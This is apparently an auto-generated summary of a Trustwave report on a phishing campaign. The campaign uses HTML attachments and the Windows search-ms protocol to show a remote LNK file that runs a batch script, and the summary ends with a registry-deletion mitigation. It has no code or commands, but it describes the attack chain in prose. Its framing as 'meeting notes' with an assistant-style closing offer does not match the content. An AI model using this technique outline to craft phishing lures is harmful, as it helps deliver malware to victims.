June 12, 2024 at 06:33PM
A new phishing campaign uses HTML attachments to exploit the Windows search protocol, enabling remote servers to deliver malware via batch files. Attackers can manipulate the search window’s title and force searches on remote hosts. The technique was highlighted by Prof. Dr. Martin Johns in 2020 and is now used by threat actors to evade security/AV scanners.
Based on the meeting notes, it appears that a new phishing campaign is utilizing HTML attachments that manipulate the Windows search protocol (search-ms URI) to execute batch files hosted on remote servers, ultimately delivering malware. This campaign takes advantage of the Windows Search protocol’s ability to query file shares on remote hosts and use a customized title for the search window. Additionally, the attackers are deploying an attack chain that involves exploiting a Microsoft Office flaw to initiate searches directly from Word documents.
The recent attacks described in the Trustwave report involve malicious emails with HTML attachments disguised as invoice documents within small ZIP archives to evade security/AV scanners. The HTML files contain code to automatically open a malicious URL when the document is accessed, and a clickable link to the malicious URL as a fallback mechanism. By using the Windows Search protocol, the attackers can execute a search on a remote host with specific parameters, including a customized display name and using Cloudflare’s tunneling service to mask the server. The search results then display a single shortcut (LNK) file, which when clicked, triggers a batch script (BAT) hosted on the same server.
To counter this threat, Trustwave recommends deleting registry entries associated with the search-ms/search URI protocol, although this action must be executed carefully as it may also impact legitimate applications and integrated Windows features.
If you need a summary or action items from the meeting notes, please let me know.